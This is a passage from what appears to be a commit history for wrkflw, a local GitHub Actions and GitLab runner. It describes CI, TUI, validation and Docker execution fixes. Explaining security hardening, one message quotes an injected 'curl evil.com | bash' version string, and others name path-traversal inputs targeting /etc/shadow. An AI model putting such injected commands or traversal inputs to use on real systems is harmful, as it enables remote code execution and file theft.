While at it, fix the .cargo/config.toml creation for
aarch64-linux-gnu cross-compilation to use > instead of >> for
the first line, so we don't append duplicate entries if the file
somehow already exists.
* ci(release): fix three review issues in release workflow
The release workflow had a few things that would bite you at
exactly the wrong moment:
The prev_tag selection was using grep -v to exclude the current
tag, then grabbing the first result from a descending version
sort. Problem is, if you're doing a backport release for v1.0.1
and v2.0.0 already exists, you'd get v2.0.0 as your "previous"
tag. The changelog range would then be backwards and produce
garbage. Use sed to find the current tag's position in the sorted
list and grab the one *after* it instead.
The build job had no dependency on the changelog job, which means
tag validation could fail and six runners would still happily
churn away building binaries that nobody will ever use. Waste of
perfectly good CI minutes. Add needs: [changelog] so builds are
gated behind validation.
While at it, cap the first-release changelog to 100 commits. An
unbounded git log dumped into a GitHub release body is the kind
of thing that works fine until your repo has a thousand commits
and the API starts having opinions about payload size.
* ci(release): parallelize build, validate tag format, cache cargo-workspaces
Three things that should have been caught earlier:
The build job had a `needs: [changelog]` dependency for absolutely
no reason — it doesn't use any changelog outputs. All it did was
serialize the pipeline and add ~20s of dead time before the actual
builds started. The release and publish jobs already depend on both,
so the ordering was always preserved where it matters. Remove it.
The RELEASE_TAG env var comes from user input on workflow_dispatch,
and we were feeding it straight into sed patterns and git log range
expressions without validating the format first. Add a regex check
for vX.Y.Z *before* any shell interpolation happens. Defense in
depth — the trust boundary is already at repo write access, but
let's not be sloppy about it.
While at it, cache the cargo-workspaces binary in the publish job.
Compiling it from source on every single release is the kind of
waste that's easy to ignore until you don't.
* ci: harden CI permissions and fix release tag validation
The CI workflow was running with default token permissions, which
is more access than a read-only lint-and-build pipeline should ever
have. Add an explicit `permissions: { contents: read }` because
least-privilege is not optional.
The tag format regex in the release workflow was unanchored — it
matched *prefixes*, so `v1.0.0garbage` sailed right through. Anchor
it with `$` and add an optional pre-release suffix group so tags
like `v1.0.0-beta.1` still work. Please don't ship unanchored
validation regexes.
While at it, replace the sed-based prev-tag lookup with `grep -F -x`
for exact matching. The old sed pipeline treated dots in the tag as
regex wildcards, which is the kind of thing that works fine until it
doesn't. The new approach does literal matching and handles the
no-previous-tag edge case explicitly.
* ci(release): add --locked to builds and guard changelog tag lookup
The release builds were running without --locked, which means cargo
is free to re-resolve dependencies however it pleases. For a release
binary, that's *not great* — you want reproducible builds from the
exact Cargo.lock that was committed, not whatever cargo feels like
doing today.
While at it, the changelog generation was silently falling through
to the "list all commits" path if the release tag wasn't found in
the tag list. Now it emits a ::warning annotation so you at least
know something went sideways instead of staring at a suspiciously
long changelog wondering where it all came from.
|
||
|
|
14d30b6b57 |
feat(ui): add job selection mode to TUI for running individual jobs (#80)
* feat(ui): add job selection mode to TUI for running individual jobs
The CLI already has --job to run a single job, but the TUI had no
way to do this. You could only run entire workflows, which is the
kind of all-or-nothing approach that gets old fast when you have a
workflow with 12 jobs and you just want to re-run "lint".
Add a job selection sub-view to the Workflows tab. Press Enter on a
workflow to drill into its jobs (parsed via parse_workflow), then
Enter on a job to run just that one (with its transitive deps), or
'a' to run all, or Esc to go back. The selected job flows through
as target_job in ExecutionConfig, reusing the exact same filtering
logic the CLI --job flag already uses.
While at it, updated the status bar hints and help overlay to
document the new keybindings.
* fix(ui): stop target_job from leaking across queued workflows
The job selection feature added in
|
||
|
|
f05cbca3b9 |
feat(ui): make TUI optional behind a cargo feature flag (#79)
* feat(ui): make TUI optional behind a cargo feature flag The TUI is great for interactive use, but if you want to run wrkflw as a headless CI runner, dragging in ratatui and crossterm is pointless baggage. Issue #41 asked for this, and honestly the code was already well-isolated enough that it *should* have been optional from the start. Add a `tui` feature flag (default-on) to both the `wrkflw-ui` crate and the main binary crate. When disabled via `--no-default-features`, ratatui/crossterm are gone, the `tui` subcommand disappears, and running with no args prints help instead of launching the TUI. All CLI subcommands (validate, run, trigger, list) remain fully functional. While at it, removed the direct crossterm/ratatui deps from the binary crate — it never imported them, they were just coming through transitively anyway. * refactor(ui): feature-gate models and utils, clean up cfg imports The previous commit gated the TUI behind a feature flag but left the models and utils modules unconditionally compiled. It turns out that *every single consumer* of those modules is TUI-gated code — they were compiling to dead code when building with --no-default-features. Gate models and utils behind cfg(feature = "tui") where they belong. While at it, consolidate the five separate #[cfg(feature = "tui")] annotations on imports in workflow.rs into a single grouped use block, because repeating the same attribute five times in a row is not my idea of readability. Also add a cargo check --no-default-features step to CI so this kind of thing doesn't silently regress. * ci(build): drop archived actions-rs/cargo, add --workspace to feature check The actions-rs/cargo@v1 action has been archived for a while now, and wrapping every cargo invocation in a GitHub Action that just... calls cargo... was never exactly adding value. Replace all five uses with plain `run: cargo <cmd>` steps. While at it, add --workspace to the --no-default-features check so it actually verifies *all* crates compile without the tui feature, not just the default workspace member. The previous version would happily miss breakage in any non-default crate. |
||
|
|
ebabe6414a |
feat(validate): cross-check local composite action required inputs (#78)
* feat(validate): cross-check local composite action required inputs The validate command was happily declaring workflows "valid" even when they used a local composite action without providing its required inputs. The workflow would then blow up at runtime, which is *exactly* the kind of thing a validator should catch. The problem was that validate_action_reference() only checked whether the local action path existed on disk. It never bothered to read the action.yml, look at the inputs section, or verify that required inputs were actually provided in the step's `with:` block. So it was doing about half its job. Thread the repo root path through the validator call chain (evaluate_workflow_file → validate_jobs → validate_steps → validate_action_reference) so we can resolve local action paths. Then read and parse the action.yml, extract inputs with `required: true` and no default, and flag any that are missing from the step's `with:` params. Case-insensitive matching because that's what GitHub Actions does. Graceful degradation: if we can't find the repo root or the action file is unreadable, we silently skip rather than blowing up. 10 new unit tests cover the various cases. Closes #67 * fix(validate): handle string `required` and drop unsafe cwd fallback Two bugs in the local action input validation that just landed: First, `find_repo_root` was falling back to `current_dir()` when no `.git` directory was found. This is *wrong* — if you're validating a workflow outside a git repo, the cwd could be literally anywhere, and you'd end up resolving local action paths against some random directory. Return `None` and skip the check instead. Second, `required: 'true'` (as a YAML string) was silently treated as not required, because we only checked `as_bool()`. GitHub Actions treats the string "true" as truthy, so we should too. Add case-insensitive string matching alongside the bool check. While at it, add a test for the string `required` case so we don't regress on this. |
||
|
|
452044f9d2 |
feat(cli): add --job flag to run a specific job and --jobs to list them (#77)
* feat(cli): add --job flag to run a specific job and --jobs to list them Until now, wrkflw only operated at the workflow level. You could run an entire workflow or list workflow files, but if you wanted to debug a single failing job you had to sit through every other job first. This is not great. Add `--job <name>` to `wrkflw run` so you can execute exactly one job in isolation, skipping dependency resolution entirely. Add `--jobs` to `wrkflw list` so you can actually *see* what jobs are available before running them. Both work for GitHub workflows and GitLab pipelines. The filtering happens after dependency resolution — we just replace the execution plan with a single-job batch. If the job name doesn't exist, we tell you what's available instead of silently doing nothing. The TUI still runs full workflows; job selection there is a separate concern. Closes #68 * fix(executor): include transitive deps when running a single job The --job flag was replacing the entire execution plan with just the target job, silently dropping all its dependencies. So if you ran --job deploy and deploy needs build which needs setup, you'd get deploy running alone with none of its prerequisites. Confusion ensues. Extract the duplicated inline filtering (copy-pasted verbatim across both the GitHub and GitLab execution paths) into a shared filter_plan_to_job() helper in dependency.rs. The new logic walks the needs graph via BFS to collect transitive deps, then prunes the existing topologically-sorted plan to only include relevant jobs while preserving batch ordering. Add 9 unit tests covering the dependency collection and plan filtering — linear chains, diamond graphs, partial subgraph isolation, error paths, and empty batch removal. * fix(executor): use stage-aware filtering for GitLab --job flag It turns out that filter_plan_to_job walks `needs` edges to find transitive dependencies, which works fine for GitHub workflows. But GitLab pipelines use *stage ordering* for implicit dependencies, and convert_to_workflow_format sets `needs: None` on every converted job. So running `--job deploy` on a GitLab pipeline would silently drop all build and test jobs. Not great. Add filter_plan_to_job_by_stage that understands the GitLab model: keep all jobs in earlier stage batches (they're implicit deps) and filter only the target's own batch down to just the target job. The GitHub workflow path continues using the needs-based filter. While at it, extract the job-not-found error into a shared helper and add proper test coverage: 6 unit tests for the stage-aware filter plus 3 integration tests exercising the full execute_workflow path with target_job set. |
||
|
|
781bd42b21 |
fix(docker): persist setup action images across job steps (#76)
* fix(docker): persist setup action images across job steps Reported in #60. When a workflow uses actions like setup-node or setup-php, the Docker image resolved for that action (e.g. node:20-slim, composer:latest) was only used for the action step itself. Every subsequent `run:` step would blissfully fall back to ubuntu:latest, which of course has neither node nor composer. Confusion ensues. It turns out that `execute_job()` computes `runner_image_value` exactly *once* via `get_effective_runner_image()` and never updates it. The action step gets its own image from `prepare_action()`, but that image is completely ignored for subsequent `run:` steps. So your setup-node configures... nothing, as far as run steps care. Fix this by pre-scanning all job steps for known setup actions before the step loop begins. Single setup action? Use its image. Multiple setup actions (e.g. Laravel's PHP + Node.js combo)? Build a combined Dockerfile that installs all required runtimes on the ubuntu base. No setup actions? Nothing changes — fully backward compatible. While at it, skip the pointless pull attempt for locally-built wrkflw-* images (they only exist locally, the 404 from Docker Hub was just noise), and bump the build_image timeout from 2 minutes to 10 — because installing PHP from a PPA inside a Docker build is not a speed demon. Closes #60 * fix(docker): harden setup action runtime detection against injection and waste The setup action detection code was interpolating user-controlled version strings straight into Dockerfile RUN directives with zero validation. So a workflow with node-version: "20; curl evil.com | bash" would happily inject arbitrary commands into the build. This is not great. It also used starts_with() for action name matching, which would match actions/setup-node-legacy or anything else that happened to share the prefix. And every single build generated a UUID-tagged image that was never cleaned up, so you'd accumulate orphaned wrkflw-combined:* images until your disk had opinions about it. While at it, the 2-minute to 10-minute timeout bump was applied to *all* image builds, not just the combined runtime ones that actually need it. And the Go install script hardcoded linux-amd64, which is the kind of thing that works right up until someone runs on ARM. Let's fix all of it: - Validate version strings against [a-zA-Z0-9._-] before use - Use exact equality for action repo matching, not prefix matching - Use deterministic content-based image tags so identical runtime combinations reuse cached images - Deduplicate same-language setup steps (last one wins) - Scope the 10-minute timeout to wrkflw-combined:* builds only - Detect container architecture for Go installs - Add tests for all of the above * fix(docker): fix three correctness bugs in setup action image resolution The previous commit introduced setup action detection, but it had a few problems that would bite people in practice. First, the single-runtime path was returning bare images like node:20-slim or python:3.12-slim directly. These images don't have git installed, which means actions/checkout — typically the *first* step in any workflow — would just fail. Not great. Fix: always build a combined image on top of the runner base (catthehacker/ubuntu:act-latest) even for single-runtime jobs, so git and friends remain available. The SetupRuntime.image field is now dead code, so remove it entirely. Second, the Python install script was cheerfully ignoring the requested version and installing whatever python3 the distro ships. Ask for 3.12, get 3.10. Surprise. Fix: use the deadsnakes PPA to install the specific version requested. Third, PodmanRuntime had no skip-pull guard for locally-built wrkflw-* images, so podman would attempt to pull wrkflw-combined:* from a registry. Add --pull=never for wrkflw-* prefixed images. * refactor(docker): unify setup action registry and fix remaining review issues The previous commits introduced setup action detection, but left a few things in a state that would annoy anyone who looked closely. First, determine_action_image() was still using starts_with() for action matching — the exact same bug that detect_setup_runtimes had already fixed. So "actions/setup-node-legacy" would happily match as a Node.js setup action. Not great. Second, dtolnay/rust-toolchain conventionally encodes the toolchain in the @ref (e.g., @nightly, @1.75.0), not in a with.toolchain key. The old code would silently default to "stable" for anyone using the idiomatic form. Surprise. Third, the repetitive if/else chain in detect_setup_runtimes (seven near-identical blocks) and the parallel match in determine_action_image were two independent copies of the same knowledge, with no compile-time guarantee they'd stay in sync. Adding a new setup action meant editing two places and hoping you remembered both. Fix all of it: - Introduce a single SETUP_ACTIONS const table that both functions consume, eliminating the drift risk entirely - Add version_from_ref support so dtolnay/rust-toolchain@nightly actually produces "nightly" instead of "stable" - Extract generate_combined_dockerfile() and combined_image_tag() as pure testable functions - Merge all install scripts into a single RUN layer instead of N separate apt-get update calls - Include a content hash in image tags so install script changes invalidate cached images even when language/version pairs are the same - Add 15 tests covering all the above * fix(docker): add image caching, stable hashing, and shared constants The combined runtime image code had three problems that were all independently annoying but together made for a lovely trifecta of "why is this slow and also fragile." First, build_combined_runtime_image was *always* rebuilding the Docker image, even when a perfectly good one already existed locally. That means every single job run was creating temp dirs, writing Dockerfiles, tarring contexts, and shipping them to the daemon. For absolutely no reason. Second, the image tag hash used DefaultHasher, which Rust's own docs explicitly say is not stable across versions. So upgrading your Rust toolchain silently invalidates every cached image. Not great when caching is the whole point. Third, the "wrkflw-" and "wrkflw-combined:" prefixes were hardcoded as magic strings in three separate files. Change one, forget the others, and you get to debug why podman is trying to pull a locally-built image from Docker Hub. The fix: add image_exists() to ContainerRuntime so we can skip redundant builds, replace DefaultHasher with FNV-1a for stable cross-version hashing, and extract the prefixes into shared constants. While at it, merge the duplicate apt-get update calls in the generated Dockerfile into a single RUN layer. * fix(docker): fix version_from_ref with SHA pins and normalize .x suffixes The version_from_ref logic for dtolnay/rust-toolchain was happily treating a pinned git SHA (the 40-char hex kind) as a toolchain name. So `dtolnay/rust-toolchain@d4ff7a3c5...` would try to install Rust toolchain "d4ff7a3c5...", which rustup finds *deeply* confusing. Filter out bare SHAs with the existing is_git_sha() check and fall back to the default version instead. While at it, the ".x" suffix that's idiomatic for Node versions (e.g., "16.x") was leaking through to install scripts for every language. Python would try to apt-get install python16.x, which is not a real package and never will be. Normalize the suffix away at extraction time rather than making each install script deal with it independently. Add tests for both cases. |
||
|
|
fd348a460e |
fix: actually execute Docker-based GitHub Actions instead of emulating them (#74)
* fix(executor): actually execute Docker-based GitHub Actions instead of emulating them Third-party GitHub Actions that use Docker (like super-linter) were silently passing without ever *actually running*. The engine would resolve the action, pick a Docker image, and then... run `echo 'Would execute GitHub action: ...'` inside it. Every single time. Regardless of runtime mode. Confusion ensues. It turns out there were two separate failures conspiring here: 1. `prepare_action()` would error out on `ActionType::DockerBuild` with "not yet supported", fall back to `determine_action_image()`, and cheerfully return `node:20-slim` for super-linter. This is not great. 2. The `PreparedAction::Image` execution branch had three sub-paths for is_docker, is_local, and everything else — and *all three* just ran echo commands. The image was resolved correctly and then completely ignored. The fix has several parts: - Add a `NativeDocker` variant to `PreparedAction` that means "run this image with its built-in ENTRYPOINT, no command override." Docker registry actions and DockerBuild actions both use this. - Implement DockerBuild properly: clone the repo, resolve the Dockerfile path from action.yml, build it, return the tag. Uses the existing `shallow_clone` and `runtime.build_image`. - Fix `build_image_inner` to tar the *full context directory* instead of just the Dockerfile. The old code had `_context_dir` sitting right there, computed and unused. COPY instructions in Dockerfiles need the context, obviously. - Allow empty `cmd` in `run_container` to mean "use the image's default ENTRYPOINT/CMD". The Docker impl now sets `config.cmd = None` when cmd is empty. Podman already handled this correctly. The existing `PreparedAction::Image` path with all its special-cased action handling (actions-rs, checkout, etc.) is completely untouched. Closes #59 * fix(executor): fix macOS entrypoint hang, path traversal, and silent emulation pass Three bugs in the Docker action execution path from the previous commit: 1. The macOS emulation entrypoint override (`bash -l -c`) was applied *unconditionally*, even when cmd was empty (NativeDocker path). That means Docker actions running on macOS emu images would get bash with no argument — which either hangs forever or exits immediately. The image's real ENTRYPOINT gets discarded either way. This is not great. Fix: capture `has_cmd` before cmd_vec is moved into the config, only apply the bash wrapper when there's actually a command to wrap. 2. The `dockerfile_rel` extracted from action.yml's `runs.image` was not sanitized after stripping the `docker://` prefix. A malicious action.yml with `docker:///etc/shadow` or `../../sensitive` would escape the action directory via Path::join's absolute-path behavior or dotdot traversal. Fix: strip leading slashes and reject any path containing `..`. 3. Emulation mode returned exit_code 0 for Docker actions it *didn't actually run*. Users got a green checkmark for actions that were silently skipped. Confusion ensues. Fix: return exit_code 1 with a clear stderr message explaining the action was not executed and needs --runtime docker. While at it, add tests for all three fixes: NativeDocker variant construction, dockerfile path sanitization (6 cases), and emulation empty-cmd failure behavior. * fix(executor): harden Docker action security and fix docker:// execution path Three issues found during review, all in the Docker action plumbing: 1. The `is_docker` path in `prepare_action()` was returning `PreparedAction::Image` instead of `NativeDocker`, which means `docker://` prefixed actions in `uses:` went straight through the legacy echo-command path and *never actually executed*. Same class of bug we just fixed for DockerBuild, hiding in plain sight. 2. The path traversal check for Dockerfile paths used `contains("..")`, which rejects perfectly legitimate directory names like `foo..bar/`. Check for `..` as an actual path *component* instead via `split('/').any(|c| c == "..")`. 3. `build_image_inner` was calling `append_dir_all` on untrusted action repositories without disabling symlink following. A malicious action repo could plant a symlink pointing at the host filesystem and have its contents shipped into the Docker build context. That's the kind of thing that makes security auditors lose sleep. Set `follow_symlinks(false)` on the tar builder. * fix(executor): wire up runs.entrypoint, runs.args, and fix local Docker dispatch The previous commits got the NativeDocker path working for remote actions, but left several holes that a code review correctly identified. Let's fix them all. First, local Docker actions (uses: ./my-action with a Dockerfile) were *still* returning PreparedAction::Image instead of NativeDocker. Same class of bug we just fixed for remote actions, hiding one function call away. They now go through NativeDocker and parse the local action.yml for entrypoint/args. Second, runs.entrypoint and runs.args from action.yml were being completely ignored. Docker actions that declare their entrypoint in action.yml (which is, you know, *a lot of them*) would silently use the wrong entrypoint. Add an entrypoint parameter to the ContainerRuntime trait and thread it through all four implementations: Docker sets Config.entrypoint, Podman passes --entrypoint, and the emulation runtimes accept-and-ignore it. Third, with.args from workflow steps (uses: docker://alpine with args: "echo hello") was not being passed as container CMD. It now overrides runs.args when present, matching GitHub Actions behavior. While at it: - Extract sanitize_dockerfile_rel into a real function instead of having the tests duplicate the logic and test their own copy. Testing a copy of your code instead of the actual code is not what I'd call confidence-inspiring. - Add canonicalize() defense-in-depth after Dockerfile path resolution to catch symlink escapes. - Document the build_image_inner context directory invariant. * fix(executor): fix broken args parsing, empty dockerfile path, and silent entrypoint drop Three correctness bugs found during review of the Docker action execution path: 1. with.args was being split on whitespace like a caveman. An argument like "hello world" would turn into two separate args, which is *not* how GitHub Actions works. Use shlex::split() for proper shell-word parsing, with a whitespace fallback for malformed input that shlex chokes on. 2. sanitize_dockerfile_rel() happily accepted empty strings. Feed it "" or "docker://" and it would produce an empty path, which then joins to a directory instead of a file. The subsequent docker build would fail with a confusing error. Let's just reject empty paths upfront. 3. SecureEmulationRuntime silently swallowed the entrypoint override without telling anyone. If you're running in secure emulation mode and your action specifies runs.entrypoint, you deserve to know it's being ignored — not left wondering why your action isn't doing what you expect. * fix(executor)!: pass explicit build context to Docker image builds It turns out that build_image_inner was deriving the Docker build context from dockerfile.parent(), which is *wrong* when the Dockerfile lives in a subdirectory of the action root. An action with runs.image: subdir/Dockerfile would get subdir/ as its build context instead of the action root, silently breaking every COPY instruction that references files outside that subdirectory. The fix is straightforward: add an explicit context_dir parameter to the ContainerRuntime::build_image trait so callers tell us what the context is instead of us guessing from the Dockerfile path. The DockerBuild path in engine.rs now passes &action_dir, and the Docker inner implementation computes the Dockerfile path relative to context_dir via strip_prefix instead of just using file_name(). While at it, add a warning log when shlex::split fails to parse with.args (unmatched quotes). Previously this silently fell back to naive whitespace splitting, which is the kind of thing that makes you stare at container logs for an hour wondering why your quoted argument got split into three pieces. * fix(executor): reject bad dockerfile paths instead of silently guessing Three bugs found during review: The build_image_inner strip_prefix fallback was *silently* using just the filename when the Dockerfile wasn't a clean descendant of the context directory. So if something weird happened with the path, you'd just get the wrong Dockerfile used for the build with zero indication anything went wrong. That's not a fallback, that's a footgun. Return an error instead. sanitize_dockerfile_rel was happily preserving a leading "./" from the raw path, which then caused strip_prefix to fail (because "./build/Dockerfile" is not a prefix-match for a joined path). Strip it early so the downstream path arithmetic actually works. While at it, extract_docker_runs_config was using filter_map on runs.args, which means non-string YAML values like integers and booleans were silently dropped. GitHub Actions coerces those to strings, so we should too. * fix(executor): handle string-form args and reject malformed with.args It turns out that extract_docker_runs_config only handled runs.args as a YAML sequence. If an action.yml declared args as a plain string (which GitHub Actions absolutely allows), we'd silently drop the entire argument. Not great. While at it, the with.args parser had the opposite problem — when shlex::split hit an unmatched quote, it shrugged and fell back to naive whitespace splitting. That's the kind of "graceful degradation" that produces subtly wrong container invocations and makes you spend an afternoon wondering why your action is getting the wrong flags. Fix both: extract_docker_runs_config now handles args as either a YAML sequence or a string (shell-tokenized via shlex). The with.args path now returns a hard error on malformed quoting instead of pretending everything is fine. Added tests for string-form args including the bad-quoting edge case. * fix(executor): close sub_path traversal hole and make args parsing consistent It turns out that sub_path from action references (the part after owner/repo in owner/repo/some/subdir) was being joined to the clone directory with absolutely no sanitization. A crafted sub_path like "../../etc" would escape the cloned repo and get passed as the Docker *build context*. Please don't do that. Add sanitize_sub_path() that rejects any path component equal to "..", and apply it in both the DockerBuild and Composite action paths. For DockerBuild, also canonicalize the resolved action_dir and verify it's still inside the repo_dir — because symlinks exist and trusting user-controlled paths is how we end up on HN. While at it, fix a behavioral inconsistency in args parsing: bad quoting in action.yml's runs.args was silently falling back to the raw string, while the exact same bad quoting in a workflow's with.args was a hard error. Now both are errors, because silently doing the wrong thing is worse than loudly refusing. * fix(executor): harden Docker build context, sanitize inputs, deduplicate mount setup The PR review flagged several issues ranging from correctness to performance to plain old code smell. Let's address them all. It turns out that build_image_inner was happily tarring the *entire* context directory and shipping it to the Docker daemon, cheerfully ignoring any .dockerignore file. For large action repos with test fixtures, docs, and who knows what else, this is not great. When a .dockerignore exists, we now use the `ignore` crate's WalkBuilder to walk only non-ignored files. Falls back to the old append_dir_all when there's no .dockerignore, because we're not breaking anything that already works. The sanitize_sub_path and sanitize_dockerfile_rel functions checked for ".." traversal but not null bytes, which can cause truncation at OS boundaries and potentially bypass the traversal check. Please don't do that. Added null byte rejection to both. extract_docker_runs_config was taking &Option<T> instead of Option<&T>, which is the Rust equivalent of wearing your shirt inside out — it works, but everyone who sees it knows something is wrong. Fixed the signature and all callers. The with.args empty-string handling was also wrong: `with.args: ""` was treated as "no override" instead of "pass zero args", which doesn't match GitHub Actions behavior where the presence of the key is the signal, not its value. While at it, extracted the volume/env/mount setup boilerplate that was copy-pasted across three execution paths into a StepContainerContext helper. Not because I enjoy moving code around, but because the same 12 lines in three places is not my idea of maintainability. * fix(executor): cap build context size, disable git hooks, add NativeDocker tests Three security and reliability fixes from the PR review: The build_image_inner tar buffer was completely unbounded — a malicious or just absurdly large action repo with no .dockerignore would happily try to load the entire thing into memory. Now we track cumulative file sizes and bail at 500 MB. The old append_dir_all fallback had to go since it gives us no per-file hook; replaced it with an ignore::WalkBuilder walk (already a dep) so both paths enforce the same limit. shallow_clone was happily running git checkout on untrusted repos without disabling hooks. A cloned repo's .git/hooks/post-checkout runs automatically, which is the kind of thing that makes security reviewers lose sleep. Pass -c core.hooksPath=/dev/null to every git invocation so cloned repos can't execute anything on our host. While at it, add a MockContainerRuntime and four integration tests that exercise the NativeDocker execute_step path end-to-end: entrypoint passthrough, with.args override + INPUT_* injection, empty args, and step/job env propagation. This path previously had zero test coverage for the runtime flow. * fix(executor): deduplicate build context walker, harden sub_path, add missing tests The build_image_inner code in docker.rs had two near-identical ~50-line walker loops — one for when .dockerignore exists and one for when it doesn't. The *only* difference was a single add_custom_ignore_filename() call on the builder. Copy-paste like that drifts. Let's not. Merged into a single loop with a conditional on the WalkBuilder before iteration. Same behavior, half the code. While at it, sanitize_sub_path now splits on both '/' and '\' so a Windows-style traversal like "a\..\..\etc" doesn't sneak past the check. Also expanded the PreparedAction::Image doc comment to explain which code paths still produce it and why it's distinct from NativeDocker — future contributors shouldn't have to guess. Added tests for: unmatched-quote error path in with.args, with.args overriding runs.args, and backslash path traversal in sub_path. * fix(executor): close backslash traversal gap and add with.entrypoint override It turns out that sanitize_dockerfile_rel was only splitting on '/' to catch ".." traversal, while its sibling sanitize_sub_path was correctly splitting on both '/' and '\\'. So a crafted Dockerfile path like "..\\..\\etc\\shadow" would sail right past the sanitizer. The canonicalize() defense-in-depth below *would* catch this in practice, but relying on one security layer to cover a hole in another is not great. Let's just make them consistent. While at it, the NativeDocker execution path was missing support for with.entrypoint — a documented GitHub Actions feature that lets workflow steps override the Docker container's ENTRYPOINT. We were already handling with.args but silently ignoring with.entrypoint, which is the kind of asymmetry that bites you the moment someone actually tries to use it. * fix(executor): close composite sub_path symlink hole and filter empty entrypoint The DockerBuild handler had a proper canonicalize + starts_with defense-in-depth check after resolving sub_path, but the composite action handler just blindly trusted sanitize_sub_path() and called repo_dir.join(p) without verifying the result stayed inside the cloned repo. A symlink named "legit" pointing to "../../secrets" would sail right through the string-only sanitizer. That is not great. Add the same canonicalize + starts_with check to the composite action path so both handlers have identical protection. While at it, filter empty-string entrypoint values to None in both extract_docker_runs_config and the Docker runtime layer. An empty runs.entrypoint in action.yml should mean "use the image default", not "tell Docker to clear the entrypoint" — which is what passing Some("") actually does. Added tests for both the with.entrypoint override path and the empty entrypoint filtering. * fix(executor): filter empty podman entrypoint and extract NativeDocker step handler The podman runtime was happily passing `--entrypoint ""` to podman when a workflow set `with.entrypoint: ""`, while Docker correctly filtered it out via `.filter(|s| !s.is_empty())`. So the two runtimes silently diverged on empty entrypoint behavior. Not great. Add the same filter to podman's entrypoint handling so both runtimes treat empty strings as "use the image default." While at it, extract the ~90-line NativeDocker match arm from execute_step into its own `execute_native_docker_step` function. That match block was getting unwieldy, and this keeps each action type's execution logic self-contained. Also drop a TODO on the in-memory tar buffer in build_image_inner — it holds the entire build context in a Vec<u8>, which gets uncomfortable as repos approach the 500 MB cap. |
||
|
|
8a8d7e5eec |
fix: resolve correctness, security, and parsing bugs across codebase (#73)
* fix: resolve 10 bugs found during full codebase review
- Fix memory leak from Box::leak() in status bar render loop
- Fix AES-GCM nonce reuse vulnerability in encrypted secret storage
- Fix Default impl for EncryptedSecretStore that discarded encryption key
- Fix early return in list command that prevented GitLab pipeline listing
- Fix double validation call in validate_github_workflow
- Wire --show-action-messages CLI flag through ExecutionConfig
- Add serde(rename = "if") to GitLab Rule if_ field for correct deserialization
- Fix potential panic on multibyte paths in workflow tab path shortening
- Include involved job names in circular dependency error messages
- Improve cron syntax validation to check value ranges, steps, and expressions
* fix: address PR review feedback
- Remove dead `_nonce` parameter from `EncryptedSecretStore::from_data`
- Add clarifying comment for inverted show/hide action messages mapping
- Add comprehensive cron validation tests (valid expressions, out-of-range
values, wrong part count, invalid steps, invalid ranges, edge cases)
* fix: resolve 27 bugs found during full codebase verification
A thorough manual verification of every feature uncovered a
*remarkable* collection of bugs hiding in plain sight. The
highlights:
The `strategy.matrix` YAML structure was never parsed. The Job
struct had `matrix` at the top level, but GitHub Actions nests it
under `strategy.matrix`. Serde silently ignored the `strategy`
key, so matrix expansion code existed but could never run. For
absolutely no reason. Introduce a proper `Strategy` struct and
wire it through the executor.
The Step struct was missing `if`, `id`, `working-directory`,
`shell`, and `timeout-minutes` fields. Step-level conditionals
were silently dropped — every step always ran regardless of its
`if` condition. While at it, `continue-on-error` was in the
struct but had no serde rename and was never checked during
execution. Fix all of that.
The validator cheerfully reported cyclic `needs` dependencies as
"Valid". Add DFS cycle detection so `A -> B -> C -> A` is caught
at validation time instead of blowing up at execution time.
Five of eight GitLab CI test fixtures failed to parse because the
model was too rigid: `extends` only accepted arrays (not strings),
`variables` rejected integers, `cache.key` rejected structured
formats, and `script` rejected single strings. Add custom
deserializers following the existing codebase pattern.
The GitHub trigger function leaked the auth token via curl process
arguments visible in `/proc/[pid]/cmdline`. Replace with reqwest,
matching the pattern already used elsewhere. Also add symlink and
path traversal protections in the executor.
Other fixes: hardcoded matrix variable stripping replaced with
proper substitution, `show_action_messages` wired through TUI,
dead `if true {}` removed, default branch detection uses remote
HEAD instead of current branch, cron validator accepts named
days/months, reusable workflow ref validation loosened from OR
to AND, matrix include entries merge into all matching combos.
* fix: harden step-level evaluation, volume checks, and add tests
The PR review turned up a few things that needed fixing before this
was actually ready.
The step-level `if` condition evaluator was silently reusing the
job-level `evaluate_job_condition` function, which knows nothing
about step-scoped expressions like `steps.<id>.outcome`, `success()`,
`failure()`, `always()`, or `cancelled()`. These would fall through
to the generic "unknown condition" path without so much as a warning.
Now they're detected early, a warning is logged, and they default to
true — which is at least *honest* about the limitation.
The volume path traversal check (`..`) was applied to the entire
volume spec string, meaning a perfectly legitimate container path
like `/safe/host:/container/..weird` would get rejected. The check
now only inspects the host path component after splitting on `:`,
which is the part that actually matters for traversal attacks.
While at it, renamed the awkwardly-named `step_name_for_skip` to
just `step_name` in `execute_matrix_job` for consistency with
`execute_job`, and added a BREAKING_CHANGES.md documenting the
EncryptedSecretStore serialization format change.
Added 19 new tests covering matrix include/exclude merge semantics,
step condition evaluation for unsupported expressions, volume path
traversal edge cases, and continue-on-error + step-level if parsing.
* fix: correct condition defaults, path traversal check, and null variable handling
The previous commit defaulted *all* unsupported step-level
condition functions (failure(), cancelled(), always(), success())
to true. It turns out that defaulting failure() and cancelled()
to true is semantically wrong — it means steps guarded by
`if: failure()` will *always* run, even when nothing failed.
That's not a feature, that's a bug.
Default each function to its most likely state: always() and
success() return true, failure() and cancelled() return false.
Not perfect (we still can't track actual step outcomes), but at
least we're not silently running cleanup steps on every build.
The path traversal check was using `contains("..")` which is a
substring match. A directory literally named `..hidden` would
get rejected. Use Path::components() to detect actual ParentDir
components instead of playing string matching games.
While at it, fix deserialize_variables in the GitLab models to
handle YAML null values as empty strings instead of producing
"~\n". Also trim the catch-all serialization output.
* fix: correct cycle detection, condition evaluation, and matrix continue-on-error
The DFS cycle detector in `dfs_detect_cycle` had a genuinely nasty bug:
when a cycle was found, it returned early *without popping itself from
rec_stack*. This left stale entries that corrupted the stack for
subsequent DFS traversals. Net result: cross-edges to already-visited
nodes would be falsely reported as cycles. A→B→A is a cycle, but
D→E→A is just a cross-edge. The old code couldn't tell the difference.
Fix this properly by introducing a separate `in_stack` HashSet for O(1)
membership checks, while keeping the Vec for path reconstruction. Both
are now correctly cleaned up — no early returns skip the cleanup.
While at it, `execute_matrix_job` was silently ignoring `continue-on-error`
on the Err branch. The non-matrix `execute_job` handled it correctly,
but the matrix path would just abort the entire job. Copy-paste bugs
are fun like that. Let's fix that.
The `evaluate_job_condition` status function handling was doing sequential
`contains()` checks with early returns, which meant compound expressions
like `failure() || success()` would match `failure()` first and return
false. Now we scan for all status functions in one pass and pick the
most permissive default when positive functions are present.
Also: `convert_yaml_to_step` was hardcoding `None` for `if_condition`,
